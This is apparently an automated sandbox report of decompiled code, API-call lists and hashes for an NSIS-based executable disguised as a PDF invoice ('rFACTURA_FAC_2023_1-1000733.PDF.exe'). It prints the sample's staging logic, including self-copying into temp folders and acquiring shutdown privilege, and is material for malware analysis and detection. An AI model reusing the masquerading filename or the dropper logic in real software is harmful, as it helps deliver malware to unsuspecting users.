                                                                                                  										L71:
                                                                                                  										E0040140B(9);
                                                                                                  										goto L72;
                                                                                                  									}
                                                                                                  									goto L70;
                                                                                                  								}
                                                                                                  							}
                                                                                                  							E004058C1( *(_t197 + 0x10), 0x200010);
                                                                                                  							ExitProcess(2);
                                                                                                  						}
                                                                                                  						if( *0x7a8a40 == _t151) {
                                                                                                  							L47:
                                                                                                  							 *0x7a8aec =  *0x7a8aec | 0xffffffff;
                                                                                                  							 *(_t197 + 0x14) = E0040396D( *0x7a8aec);
                                                                                                  							goto L48;
                                                                                                  						}
                                                                                                  						_t184 = E00405B5D(_t193, _t151);
                                                                                                  						if(_t184 < _t193) {
                                                                                                  							L44:
                                                                                                  							_t236 = _t184 - _t193;
                                                                                                  							 *(_t197 + 0x10) = L"Error launching installer";
                                                                                                  							if(_t184 < _t193) {
                                                                                                  								_t182 = E0040582C(_t239);
                                                                                                  								lstrcatW(_t172, L"~nsu");
                                                                                                  								if(_t182 != _t151) {
                                                                                                  									lstrcatW(_t172, "A");
                                                                                                  								}
                                                                                                  								lstrcatW(_t172, L".tmp");
                                                                                                  								_t195 = L"C:\\Users\\Arthur\\Desktop";
                                                                                                  								if(lstrcmpiW(_t172, L"C:\\Users\\Arthur\\Desktop") != 0) {
                                                                                                  									_push(_t172);
                                                                                                  									if(_t182 == _t151) {
                                                                                                  										E0040580F();
                                                                                                  									} else {
                                                                                                  										E00405792();
                                                                                                  									}
                                                                                                  									SetCurrentDirectoryW(_t172);
                                                                                                  									_t243 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated" - _t151; // 0x43
                                                                                                  									if(_t243 == 0) {
                                                                                                  										E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t195);
                                                                                                  									}
                                                                                                  									E0040625F(0x7a9000,  *(_t197 + 0x18));
                                                                                                  									_t156 = "A" & 0x0000ffff;
                                                                                                  									 *0x7a9800 = ( *0x40a25a & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
                                                                                                  									_t196 = 0x1a;
                                                                                                  									do {
                                                                                                  										E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x120)));
                                                                                                  										DeleteFileW(0x79f6e0);
                                                                                                  										if( *(_t197 + 0x10) != _t151 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\rFACTURA_FAC_2023_1-1000733.PDF.exe", 0x79f6e0, ?str?) != 0) {
                                                                                                  											E00406025(_t156, 0x79f6e0, _t151);
                                                                                                  											E00406281(_t151, _t172, 0x79f6e0, 0x79f6e0,  *((intOrPtr*)( *0x7a8a34 + 0x124)));
                                                                                                  											_t103 = E00405844(0x79f6e0);
                                                                                                  											if(_t103 != _t151) {
                                                                                                  												CloseHandle(_t103);
                                                                                                  												 *(_t197 + 0x10) = _t151;
                                                                                                  											}
                                                                                                  										}
                                                                                                  										 *0x7a9800 =  *0x7a9800 + 1;
                                                                                                  										_t196 = _t196 - 1;
                                                                                                  									} while (_t196 != 0);
                                                                                                  									E00406025(_t156, _t172, _t151);
                                                                                                  								}
                                                                                                  								goto L48;
                                                                                                  							}
                                                                                                  							 *_t184 = _t151;
                                                                                                  							_t185 =  &(_t184[2]);
                                                                                                  							if(E00405C38(_t236,  &(_t184[2])) == 0) {
                                                                                                  								goto L48;
                                                                                                  							}
                                                                                                  							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t185);
                                                                                                  							E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t185);
                                                                                                  							 *(_t197 + 0x10) = _t151;
                                                                                                  							goto L47;
                                                                                                  						}
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						asm("cdq");
                                                                                                  						_t159 = ( *0x40a27e & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
                                                                                                  						_t120 = ( *0x40a282 & 0x0000ffff) << 0x00000010 |  *0x40a280 & 0x0000ffff | (_t164 << 0x00000020 |  *0x40a282 & 0x0000ffff) << 0x10;
                                                                                                  						while( *_t184 != _t159 || _t184[1] != _t120) {
                                                                                                  							_t184 = _t184;
                                                                                                  							if(_t184 >= _t193) {
                                                                                                  								continue;
                                                                                                  							}
                                                                                                  							break;
                                                                                                  						}
                                                                                                  						_t151 = 0;
                                                                                                  						goto L44;
                                                                                                  					}
                                                                                                  					GetWindowsDirectoryW(_t172, 0x3fb);
                                                                                                  					lstrcatW(_t172, L"\\Temp");
                                                                                                  					_t123 = E0040331F(_t155, _t225);
                                                                                                  					_t226 = _t123;
                                                                                                  					if(_t123 != 0) {
                                                                                                  						goto L36;
                                                                                                  					}
                                                                                                  					GetTempPathW(0x3fc, _t172);
                                                                                                  					lstrcatW(_t172, L"Low");
                                                                                                  					SetEnvironmentVariableW(L"TEMP", _t172);
                                                                                                  					SetEnvironmentVariableW(L"TMP", _t172);
                                                                                                  					_t128 = E0040331F(_t155, _t226);
                                                                                                  					_t227 = _t128;
                                                                                                  					if(_t128 == 0) {
                                                                                                  						goto L48;
                                                                                                  					}
                                                                                                  					goto L36;
                                                                                                  				} else {
                                                                                                  					do {
                                                                                                  						_t154 = 0x20;
                                                                                                  						if(_t66 != _t154) {
                                                                                                  							L13:
                                                                                                  							if( *_t155 == 0x22) {
                                                                                                  								_t155 = _t155 + 2;
                                                                                                  								_t154 = 0x22;
                                                                                                  							}
                                                                                                  							if( *_t155 != 0x2f) {
                                                                                                  								goto L27;
                                                                                                  							} else {
                                                                                                  								_t155 = _t155 + 2;
                                                                                                  								if( *_t155 == 0x53) {
                                                                                                  									_t148 =  *((intOrPtr*)(_t155 + 2));
                                                                                                  									if(_t148 == 0x20 || _t148 == 0) {
                                                                                                  										 *0x7a8ae0 = 1;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								asm("cdq");
                                                                                                  								asm("cdq");
                                                                                                  								_t169 = L"NCRC" & 0x0000ffff;
                                                                                                  								asm("cdq");
                                                                                                  								_t175 = ( *0x40a2c2 & 0x0000ffff) << 0x00000010 |  *0x40a2c0 & 0x0000ffff | _t169;
                                                                                                  								if( *_t155 == (( *0x40a2be & 0x0000ffff) << 0x00000010 | _t169) &&  *((intOrPtr*)(_t155 + 4)) == _t175) {
                                                                                                  									_t147 =  *((intOrPtr*)(_t155 + 8));
                                                                                                  									if(_t147 == 0x20 || _t147 == 0) {
                                                                                                  										 *(_t197 + 0x1c) =  *(_t197 + 0x1c) | 0x00000004;
                                                                                                  									}
                                                                                                  								}
                                                                                                  								asm("cdq");
                                                                                                  								asm("cdq");
                                                                                                  								_t164 = L" /D=" & 0x0000ffff;
                                                                                                  								asm("cdq");
                                                                                                  								_t178 = ( *0x40a2b6 & 0x0000ffff) << 0x00000010 |  *0x40a2b4 & 0x0000ffff | _t164;
                                                                                                  								if( *(_t155 - 4) != (( *0x40a2b2 & 0x0000ffff) << 0x00000010 | _t164) ||  *_t155 != _t178) {
                                                                                                  									goto L27;
                                                                                                  								} else {
                                                                                                  									 *(_t155 - 4) =  *(_t155 - 4) & 0x00000000;
                                                                                                  									__eflags = _t155;
                                                                                                  									E0040625F(L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\Musicalises34\\Coleman\\Biarcuated", _t155);
                                                                                                  									L32:
                                                                                                  									_t151 = 0;
                                                                                                  									goto L33;
                                                                                                  								}
                                                                                                  							}
                                                                                                  						} else {
                                                                                                  							goto L12;
                                                                                                  						}
                                                                                                  						do {
                                                                                                  							L12:
                                                                                                  							_t155 = _t155 + 2;
                                                                                                  						} while ( *_t155 == _t154);
                                                                                                  						goto L13;
                                                                                                  						L27:
                                                                                                  						_t155 = E00405B5D(_t155, _t154);
                                                                                                  						if( *_t155 == 0x22) {
                                                                                                  							_t155 = _t155 + 2;
                                                                                                  						}
                                                                                                  						_t66 =  *_t155;
                                                                                                  					} while (_t66 != 0);
                                                                                                  					goto L32;
                                                                                                  				}
                                                                                                  				L4:
                                                                                                  				E004065C9(_t179); // executed
                                                                                                  				_t179 =  &(_t179[lstrlenA(_t179) + 1]);
                                                                                                  				if( *_t179 != 0) {
                                                                                                  					goto L4;
                                                                                                  				} else {
                                                                                                  					E00406639(0xa);
                                                                                                  					 *0x7a8a24 = E00406639(8);
                                                                                                  					_t56 = E00406639(6);
                                                                                                  					if(_t56 != _t151) {
                                                                                                  						_t56 =  *_t56(0x1e);
                                                                                                  						if(_t56 != 0) {
                                                                                                  							 *0x7a8a2f =  *0x7a8a2f | 0x00000040;
                                                                                                  						}
                                                                                                  					}
                                                                                                  					goto L8;
                                                                                                  				}
                                                                                                  			}








































                                                                                                  0x00403475
                                                                                                  0x00403479
                                                                                                  0x00403482
                                                                                                  0x00403486
                                                                                                  0x0040348b
                                                                                                  0x0040348c
                                                                                                  0x0040348c
                                                                                                  0x00403491
                                                                                                  0x00000000
                                                                                                  0x00403497
                                                                                                  0x00403498
                                                                                                  0x0040349d
                                                                                                  0x0040349f
                                                                                                  0x004034a7
                                                                                                  0x004034ae
                                                                                                  0x004034ae
                                                                                                  0x004034a7
                                                                                                  0x004034bf
                                                                                                  0x004034d2
                                                                                                  0x004034d3
                                                                                                  0x004034e8
                                                                                                  0x004034ed
                                                                                                  0x004034f1
                                                                                                  0x004034fa
                                                                                                  0x00403502
                                                                                                  0x00403509
                                                                                                  0x00403509
                                                                                                  0x00403502
                                                                                                  0x00403515
                                                                                                  0x00403528
                                                                                                  0x00403529
                                                                                                  0x0040353e
                                                                                                  0x00403544
                                                                                                  0x00403548
                                                                                                  0x00000000
                                                                                                  0x0040356f
                                                                                                  0x0040356f
                                                                                                  0x00403574
                                                                                                  0x0040357d
                                                                                                  0x00403582
                                                                                                  0x00403582
                                                                                                  0x00000000
                                                                                                  0x00403582
                                                                                                  0x00403548
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x00000000
                                                                                                  0x0040347b
                                                                                                  0x0040347b
                                                                                                  0x0040347c
                                                                                                  0x0040347d
                                                                                                  0x00000000
                                                                                                  0x00403550
                                                                                                  0x00403557
                                                                                                  0x0040355d
                                                                                                  0x00403560
                                                                                                  0x00403560
                                                                                                  0x00403561
                                                                                                  0x00403564
                                                                                                  0x00000000
                                                                                                  0x0040356d
                                                                                                  0x004033a5
                                                                                                  0x004033a6
                                                                                                  0x004033b2
                                                                                                  0x004033b9
                                                                                                  0x00000000
                                                                                                  0x004033bb
                                                                                                  0x004033bd
                                                                                                  0x004033cb
                                                                                                  0x004033d0
                                                                                                  0x004033d7
                                                                                                  0x004033db
                                                                                                  0x004033df
                                                                                                  0x004033e1
                                                                                                  0x004033e1
                                                                                                  0x004033df
                                                                                                  0x00000000
                                                                                                  0x004033d7

                                                                                                  APIs
                                                                                                  • SetErrorMode.KERNELBASE ref: 00403373
                                                                                                  • GetVersion.KERNEL32 ref: 00403379
                                                                                                  • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 004033AC
                                                                                                  • #17.COMCTL32(?,00000006,00000008,0000000A), ref: 004033E9
                                                                                                  • OleInitialize.OLE32(00000000), ref: 004033F0
                                                                                                  • SHGetFileInfoW.SHELL32(0079FEE0,00000000,?,000002B4,00000000), ref: 0040340C
                                                                                                  • GetCommandLineW.KERNEL32(Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 00403421
                                                                                                  • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000000,?,00000006,00000008,0000000A), ref: 00403434
                                                                                                  • CharNextW.USER32(00000000,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000020,?,00000006,00000008,0000000A), ref: 0040345B
                                                                                                    • Part of subcall function 00406639: GetModuleHandleA.KERNEL32(?,00000020,?,004033C2,0000000A), ref: 0040664B
                                                                                                    • Part of subcall function 00406639: GetProcAddress.KERNEL32(00000000,?), ref: 00406666
                                                                                                  • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 00403595
                                                                                                  • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB,?,00000006,00000008,0000000A), ref: 004035A6
                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 004035B2
                                                                                                  • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp,?,00000006,00000008,0000000A), ref: 004035C6
                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004035CE
                                                                                                  • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low,?,00000006,00000008,0000000A), ref: 004035DF
                                                                                                  • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 004035E7
                                                                                                  • DeleteFileW.KERNELBASE(1033,?,00000006,00000008,0000000A), ref: 004035FB
                                                                                                    • Part of subcall function 0040625F: lstrcpynW.KERNEL32(?,?,00000400,00403421,Tophyperidrosis Setup,NSIS Error,?,00000006,00000008,0000000A), ref: 0040626C
                                                                                                  • OleUninitialize.OLE32(00000006,?,00000006,00000008,0000000A), ref: 004036C6
                                                                                                  • ExitProcess.KERNEL32 ref: 004036E7
                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004036FA
                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A26C), ref: 00403709
                                                                                                  • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 00403714
                                                                                                  • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe",00000000,00000006,?,00000006,00000008,0000000A), ref: 00403720
                                                                                                  • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,?,00000006,00000008,0000000A), ref: 0040373C
                                                                                                  • DeleteFileW.KERNEL32(0079F6E0,0079F6E0,?,007A9000,00000008,?,00000006,00000008,0000000A), ref: 00403796
                                                                                                  • CopyFileW.KERNEL32(C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe,0079F6E0,?,?,00000006,00000008,0000000A), ref: 004037AA
                                                                                                  • CloseHandle.KERNEL32(00000000,0079F6E0,0079F6E0,?,0079F6E0,00000000,?,00000006,00000008,0000000A), ref: 004037D7
                                                                                                  • GetCurrentProcess.KERNEL32(00000028,0000000A,00000006,00000008,0000000A), ref: 00403806
                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 0040380D
                                                                                                  • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 00403822
                                                                                                  • AdjustTokenPrivileges.ADVAPI32 ref: 00403845
                                                                                                  • ExitWindowsEx.USER32(00000002,80040002), ref: 0040386A
                                                                                                  • ExitProcess.KERNEL32 ref: 0040388D
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000000.00000002.1411782168.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_0_2_400000_rFACTURA_FAC_2023_1-1000733.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                                                                  • String ID: "C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\AppData\Local\Temp\Musicalises34\Coleman\Biarcuated$C:\Users\user\Desktop$C:\Users\user\Desktop\rFACTURA_FAC_2023_1-1000733.PDF.exe$Error launching installer$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$Tophyperidrosis Setup$UXTHEME$\Temp$~nsu
                                                                                                  • API String ID: 2488574733-2912737113
                                                                                                  • Opcode ID: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
                                                                                                  • Instruction ID: f8b53dcf82f20274bbdd851e6e7f34b77cfd1224ece1df9e86175f3a8edd883a
                                                                                                  • Opcode Fuzzy Hash: 50ce3784074dcbd526eb1f42df312bf4ec451fb13847cd92a6110888af3a5c2d
                                                                                                  • Instruction Fuzzy Hash: CED11371500310AAD7207F759D85B3B3AACEB41746F00493FF981B62E2DB7D8A458B6E
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  Control-flow Graph

                                                                                                  control_flow_graph 139 405402-40541d 140 405423-4054ea GetDlgItem * 3 call 404229 call 404b60 GetClientRect GetSystemMetrics SendMessageW * 2 139->140 141 4055ac-4055b3 139->141 163 405508-40550b 140->163 164 4054ec-405506 SendMessageW * 2 140->164 143 4055b5-4055d7 GetDlgItem CreateThread CloseHandle 141->143 144 4055dd-4055ea 141->144 143->144 146 405608-405612 144->146 147 4055ec-4055f2 144->147 148 405614-40561a 146->148 149 405668-40566c 146->149 151 4055f4-405603 ShowWindow * 2 call 404229 147->151 152 40562d-405636 call 40425b 147->152 153 405642-405652 ShowWindow 148->153 154 40561c-405628 call 4041cd 148->154 149->152 157 40566e-405674 149->157 151->146 160 40563b-40563f 152->160 161 405662-405663 call 4041cd 153->161 162 405654-40565d call 4052c3 153->162 154->152 157->152 165 405676-405689 SendMessageW 157->165 161->149 162->161 168 40551b-405532 call 4041f4 163->168 169 40550d-405519 SendMessageW 163->169 164->163 170 40578b-40578d 165->170 171 40568f-4056ba CreatePopupMenu call 406281 AppendMenuW 165->171 178 405534-405548 ShowWindow 168->178 179 405568-405589 GetDlgItem SendMessageW 168->179 169->168 170->160 176 4056bc-4056cc GetWindowRect 171->176 177 4056cf-4056e4 TrackPopupMenu 171->177 176->177 177->170 180 4056ea-405701 177->180 181 405557 178->181 182 40554a-405555 ShowWindow 178->182 179->170 183 40558f-4055a7 SendMessageW * 2 179->183 184 405706-405721 SendMessageW 180->184 185 40555d-405563 call 404229 181->185 182->185 183->170 184->184 186 405723-405746 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 184->186 185->179 188 405748-40576f SendMessageW 186->188 188->188 189 405771-405785 GlobalUnlock SetClipboardData CloseClipboard 188->189 189->170
                                                                                                  C-Code - Quality: 96%
                                                                                                  			E00405402(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
                                                                                                  				struct HWND__* _v8;
                                                                                                  				long _v12;
                                                                                                  				struct tagRECT _v28;
                                                                                                  				void* _v36;
                                                                                                  				signed int _v40;
                                                                                                  				int _v44;
                                                                                                  				int _v48;
                                                                                                  				signed int _v52;
                                                                                                  				int _v56;
                                                                                                  				void* _v60;
                                                                                                  				void* _v68;
                                                                                                  				void* __ebx;
                                                                                                  				void* __edi;
                                                                                                  				void* __esi;
                                                                                                  				struct HWND__* _t94;
                                                                                                  				long _t95;
                                                                                                  				int _t100;
                                                                                                  				int _t101;
                                                                                                  				long _t104;
                                                                                                  				void* _t108;
                                                                                                  				intOrPtr _t119;
                                                                                                  				void* _t127;
                                                                                                  				intOrPtr _t130;
                                                                                                  				struct HWND__* _t134;
                                                                                                  				int _t156;
                                                                                                  				int _t159;
                                                                                                  				struct HMENU__* _t164;
                                                                                                  				struct HWND__* _t168;
                                                                                                  				struct HWND__* _t169;
                                                                                                  				int _t171;
                                                                                                  				void* _t172;
                                                                                                  				short* _t173;
                                                                                                  				short* _t175;
                                                                                                  				int _t177;
                                                                                                  
                                                                                                  				_t169 =  *0x7a7a04; // 0x403ba
                                                                                                  				_t156 = 0;
                                                                                                  				_v8 = _t169;
                                                                                                  				if(_a8 != 0x110) {
                                                                                                  					__eflags = _a8 - 0x405;
                                                                                                  					if(_a8 == 0x405) {
                                                                                                  						_t127 = CreateThread(0, 0, E00405396, GetDlgItem(_a4, 0x3ec), 0,  &_v12); // executed
                                                                                                  						CloseHandle(_t127); // executed
                                                                                                  					}
                                                                                                  					__eflags = _a8 - 0x111;
                                                                                                  					if(_a8 != 0x111) {
                                                                                                  						L17:
                                                                                                  						_t171 = 1;
                                                                                                  						__eflags = _a8 - 0x404;
                                                                                                  						if(_a8 != 0x404) {
                                                                                                  							L25:
                                                                                                  							__eflags = _a8 - 0x7b;
                                                                                                  							if(_a8 != 0x7b) {
                                                                                                  								goto L20;
                                                                                                  							}
                                                                                                  							_t94 = _v8;
                                                                                                  							__eflags = _a12 - _t94;
                                                                                                  							if(_a12 != _t94) {
                                                                                                  								goto L20;
                                                                                                  							}
                                                                                                  							_t95 = SendMessageW(_t94, 0x1004, _t156, _t156);
                                                                                                  							__eflags = _t95 - _t156;
                                                                                                  							_a8 = _t95;
                                                                                                  							if(_t95 <= _t156) {
                                                                                                  								L36:
                                                                                                  								return 0;
                                                                                                  							}
                                                                                                  							_t164 = CreatePopupMenu();
                                                                                                  							AppendMenuW(_t164, _t156, _t171, E00406281(_t156, _t164, _t171, _t156, 0xffffffe1));
                                                                                                  							_t100 = _a16;
                                                                                                  							__eflags = _a16 - 0xffffffff;
                                                                                                  							_t159 = _a16 >> 0x10;
                                                                                                  							if(_a16 == 0xffffffff) {
                                                                                                  								GetWindowRect(_v8,  &_v28);
                                                                                                  								_t100 = _v28.left;
                                                                                                  								_t159 = _v28.top;
                                                                                                  							}
                                                                                                  							_t101 = TrackPopupMenu(_t164, 0x180, _t100, _t159, _t156, _a4, _t156);
                                                                                                  							__eflags = _t101 - _t171;
                                                                                                  							if(_t101 == _t171) {
                                                                                                  								_v60 = _t156;
                                                                                                  								_v48 = 0x7a1f20;
                                                                                                  								_v44 = 0x1000;
                                                                                                  								_a4 = _a8;
                                                                                                  								do {
                                                                                                  									_a4 = _a4 - 1;
                                                                                                  									_t104 = SendMessageW(_v8, 0x1073, _a4,  &_v68);
                                                                                                  									__eflags = _a4 - _t156;
                                                                                                  									_t171 = _t171 + _t104 + 2;
                                                                                                  								} while (_a4 != _t156);
                                                                                                  								OpenClipboard(_t156);
                                                                                                  								EmptyClipboard();
                                                                                                  								_t108 = GlobalAlloc(0x42, _t171 + _t171);
                                                                                                  								_a4 = _t108;
                                                                                                  								_t172 = GlobalLock(_t108);
                                                                                                  								do {
                                                                                                  									_v48 = _t172;
                                                                                                  									_t173 = _t172 + SendMessageW(_v8, 0x1073, _t156,  &_v68) * 2;
                                                                                                  									 *_t173 = 0xd;
                                                                                                  									_t175 = _t173 + 2;
                                                                                                  									 *_t175 = 0xa;
                                                                                                  									_t172 = _t175 + 2;
                                                                                                  									_t156 = _t156 + 1;
                                                                                                  									__eflags = _t156 - _a8;
                                                                                                  								} while (_t156 < _a8);
                                                                                                  								GlobalUnlock(_a4);
                                                                                                  								SetClipboardData(0xd, _a4);
                                                                                                  								CloseClipboard();
                                                                                                  							}
                                                                                                  							goto L36;
                                                                                                  						}
                                                                                                  						__eflags =  *0x7a79ec - _t156; // 0x0
                                                                                                  						if(__eflags == 0) {
                                                                                                  							ShowWindow( *0x7a8a28, 8);
                                                                                                  							__eflags =  *0x7a8acc - _t156;
                                                                                                  							if( *0x7a8acc == _t156) {
                                                                                                  								_t119 =  *0x7a0ef8; // 0xb7d614
                                                                                                  								_t57 = _t119 + 0x34; // 0xffffffd5
                                                                                                  								E004052C3( *_t57, _t156);
                                                                                                  							}
                                                                                                  							E004041CD(_t171);
                                                                                                  							goto L25;
                                                                                                  						}
                                                                                                  						 *0x7a06f0 = 2;
                                                                                                  						E004041CD(0x78);
                                                                                                  						goto L20;
                                                                                                  					} else {
                                                                                                  						__eflags = _a12 - 0x403;
                                                                                                  						if(_a12 != 0x403) {
                                                                                                  							L20:
                                                                                                  							return E0040425B(_a8, _a12, _a16);
                                                                                                  						}
                                                                                                  						ShowWindow( *0x7a79f0, _t156);
                                                                                                  						ShowWindow(_t169, 8);
                                                                                                  						E00404229(_t169);
                                                                                                  						goto L17;
                                                                                                  					}
                                                                                                  				}
                                                                                                  				_v52 = _v52 | 0xffffffff;
                                                                                                  				_v40 = _v40 | 0xffffffff;
                                                                                                  				_t177 = 2;
                                                                                                  				_v60 = _t177;
                                                                                                  				_v56 = 0;
                                                                                                  				_v48 = 0;
                                                                                                  				_v44 = 0;
                                                                                                  				asm("stosd");
                                                                                                  				asm("stosd");
                                                                                                  				_t130 =  *0x7a8a34;
                                                                                                  				_a8 =  *((intOrPtr*)(_t130 + 0x5c));
                                                                                                  				_a12 =  *((intOrPtr*)(_t130 + 0x60));
                                                                                                  				 *0x7a79f0 = GetDlgItem(_a4, 0x403);
                                                                                                  				 *0x7a79e8 = GetDlgItem(_a4, 0x3ee);
                                                                                                  				_t134 = GetDlgItem(_a4, 0x3f8);
                                                                                                  				 *0x7a7a04 = _t134;
                                                                                                  				_v8 = _t134;
                                                                                                  				E00404229( *0x7a79f0);
                                                                                                  				 *0x7a79f4 = E00404B60("true");
                                                                                                  				 *0x7a7a0c = 0;
                                                                                                  				GetClientRect(_v8,  &_v28);
                                                                                                  				_v52 = _v28.right - GetSystemMetrics(_t177);
                                                                                                  				SendMessageW(_v8, 0x1061, 0,  &_v60);
                                                                                                  				SendMessageW(_v8, 0x1036, 0x4000, 0x4000); // executed
                                                                                                  				if(_a8 >= 0) {
                                                                                                  					SendMessageW(_v8, 0x1001, 0, _a8);
                                                                                                  					SendMessageW(_v8, 0x1026, 0, _a8);
                                                                                                  				}
                                                                                                  				if(_a12 >= _t156) {
                                                                                                  					SendMessageW(_v8, 0x1024, _t156, _a12);
                                                                                                  				}
                                                                                                  				_push( *((intOrPtr*)(_a16 + 0x30)));
                                                                                                  				_push(0x1b);
                                                                                                  				E004041F4(_a4);
                                                                                                  				if(( *0x7a8a3c & 0x00000003) != 0) {
                                                                                                  					ShowWindow( *0x7a79f0, _t156);
                                                                                                  					if(( *0x7a8a3c & 0x00000002) != 0) {
                                                                                                  						 *0x7a79f0 = _t156;
                                                                                                  					} else {
                                                                                                  						ShowWindow(_v8, 8);
                                                                                                  					}
                                                                                                  					E00404229( *0x7a79e8);
                                                                                                  				}
                                                                                                  				_t168 = GetDlgItem(_a4, 0x3ec);
                                                                                                  				SendMessageW(_t168, 0x401, _t156, 0x75300000);
                                                                                                  				if(( *0x7a8a3c & 0x00000004) != 0) {
                                                                                                  					SendMessageW(_t168, 0x409, _t156, _a12);
                                                                                                  					SendMessageW(_t168, 0x2001, _t156, _a8);
                                                                                                  				}
                                                                                                  				goto L36;
                                                                                                  			}





































                                                                                                  0x004055a5
                                                                                                  0x004055a5
                                                                                                  0x00000000

                                                                                                  APIs
                                                                                                  • GetDlgItem.USER32(?,00000403), ref: 00405460
                                                                                                  • GetDlgItem.USER32(?,000003EE), ref: 0040546F
                                                                                                  • GetClientRect.USER32(?,?), ref: 004054AC
                                                                                                  • GetSystemMetrics.USER32(00000002), ref: 004054B3
                                                                                                  • SendMessageW.USER32(?,00001061,00000000,?), ref: 004054D4
                                                                                                  • SendMessageW.USER32(?,00001036,00004000,00004000), ref: 004054E5
                                                                                                  • SendMessageW.USER32(?,00001001,00000000,00000110), ref: 004054F8
                                                                                                  • SendMessageW.USER32(?,00001026,00000000,00000110), ref: 00405506
                                                                                                  • SendMessageW.USER32(?,00001024,00000000,?), ref: 00405519
                                                                                                  • ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040553B
                                                                                                  • ShowWindow.USER32(?,00000008), ref: 0040554F
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 00405570
                                                                                                  • SendMessageW.USER32(00000000,00000401,00000000,75300000), ref: 00405580
                                                                                                  • SendMessageW.USER32(00000000,00000409,00000000,?), ref: 00405599
                                                                                                  • SendMessageW.USER32(00000000,00002001,00000000,00000110), ref: 004055A5
                                                                                                  • GetDlgItem.USER32(?,000003F8), ref: 0040547E
                                                                                                    • Part of subcall function 00404229: SendMessageW.USER32(00000028,?,?,00404054), ref: 00404237
                                                                                                  • GetDlgItem.USER32(?,000003EC), ref: 004055C2
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00005396,00000000), ref: 004055D0
                                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 004055D7
                                                                                                  • ShowWindow.USER32(00000000), ref: 004055FB
                                                                                                  • ShowWindow.USER32(000403BA,00000008), ref: 00405600
                                                                                                  • ShowWindow.USER32(00000008), ref: 0040564A
                                                                                                  • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 0040567E
                                                                                                  • CreatePopupMenu.USER32 ref: 0040568F
                                                                                                  • AppendMenuW.USER32(00000000,00000000,00000001,00000000), ref: 004056A3
                                                                                                  • GetWindowRect.USER32(?,?), ref: 004056C3
                                                                                                  • TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 004056DC
                                                                                                  • SendMessageW.USER32(?,00001073,00000000,?), ref: 00405714
                                                                                                  • OpenClipboard.USER32(00000000), ref: 00405724
                                                                                                  • EmptyClipboard.USER32 ref: 0040572A
                                                                                                  • GlobalAlloc.KERNEL32(00000042,00000000), ref: 00405736
